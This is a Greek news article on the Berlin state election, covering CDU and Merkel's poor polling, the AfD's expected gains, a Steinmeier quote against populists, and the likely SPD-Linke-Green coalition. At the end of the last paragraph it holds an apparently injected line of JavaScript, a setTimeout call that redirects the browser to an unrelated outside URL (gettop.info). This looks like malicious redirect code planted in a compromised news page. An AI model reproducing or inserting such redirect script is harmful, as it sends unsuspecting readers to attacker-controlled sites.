Ανοίγουν οι κάλπες στο Βερολίνο – Νέα αγωνία για τη Μέρκελ

0
4

 

Περίπου 2,5 εκατομύρια Γερμανοί προσέρχονται σήμερα στις κάλπες για να αναδείξουν τοπική κυβέρνηση. Νέα αγωνία έχει η καγκελάριος Μέρκελ μετά την ταπεινωτική ήττα στην εκλογική της πατρίδα Μεκλεμπούργκ-Βορπομέρν καθώς οι δημοσκοπήσεις δίνουν στο CDU 17%-20% και υπάρχει φόβος να έρθουν τρίτοι. Άλλωστε, ήδη η δυναμική του έχει δεχθεί πλήγμα από το ακροδεξιό κόμμα Εναλλακτική για τη Γερμανία AfD που αναμένεται να συγκεντρώσει το 15% των ψήφων. Σημειωτέον ότι το ποσοστό των αναποφάσιστων είναι στο 41%.

Η Μέρκελ έχει ήδη ψηφίσει με επιστολή, δεδομένου ότι ψηφίζει στον τόπο κατοικίας της. Ο επικεφαλής του CDU Φράνκ Χένκελ δεν είναι ο τύπος του πολιτικού ο οποίος μπορεί να συνεγείρει τους ψηφοφόρους ενώ και ο μη χαρισματικός σοσιαλδημοκράτης και νυν δήμαρχος Μίχαελ Μίλερ επεδίωξε να προσελκύσει ψηφοφόρους τονίζοντας ότι το Βερολίνο ήταν ανέκαθεν μια ανεκτική και ανοικτή πόλη.

Από την πλευρά του ο σοσιαλδημοκράτης πολιτικός και υπουργός Εξωτερικών, Φρανκ-Βάλτερ Στάινμαϊερ χρησιμοποίησε πιο δραματικούς τόνους: «Κοιτάξτε τους λαϊκιστές και εθνικιστές είτε το AfD στη Γερμανία είτε του ανεύθυνους τύπους στην Μ. Βρετανία οι οποίοι οδήγησαν στη χώρα τους στην κόπρο του Brexit και δεν μπορούν να βγουν από αυτά. Κοιτάξτε τον φωνακλά στην Αμερική ο οποίος λέγεται Ντόναλντ Τραμπ. Είναι όλοι άνθρωποι οι οποίοι κάνουν πολιτική με τον φόβο των πολιτών. Είναι πραγματικός εμπρησμός για την Ευρώπη. Ανάβουν τη σπίθα, η οποία θα βάλει αργότερα φωτιά στα σπίτια των προσφύγων. Αυτή τη φωτιά μπορούμε να τη σβήσουμε στις κάλπες. Δεν χρειαζόμαστε το AfD στη Γερουσία του Βερολίνου».

Οι σοσιαλδημοκράτες του SPD αναμένεται να έρθουν πρώτο κόμμα στο Βερολίνο, με ποσοστό 20%-23% σύμφωνα με τις δημοσκοπήσεις.

Η ανάγκη να σχηματισθεί συνασπισμός τριών κομμάτων, ακόμη και με τη συμμετοχή και του Die Linke, προβάλλει όμως κατά τους παρατηρητές απολύτως μονόδρομος. Ο επικεφαλής του ψηφοδελτίου της Αριστεράς Κλάους Λέντερερ έχει επανειλημμένα τονίσει ότι είναι έτοιμος να συμμετάσχει σε μια κοκκινο-κοκκινο-πράσινη (SPD – Die Linke – Πρασίνων) κυβέρνηση στην πρωτεύουσα.

Δεδομένου ότι τόσο το χριστιανοδημοκρατικό (CDU) όσο και το σοσιαλδημοκρατικό κόμμα (SPD) έχουν πάρει τις αποστάσεις τους, ιδίως στο θέμα τις απαγόρευσης της μπούρκας στο Βερολίνο, ενώ το AfD προβάλλει πλέον ως ένα είδος ρυθμιστή των μετεκλογικών εξελίξεων. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here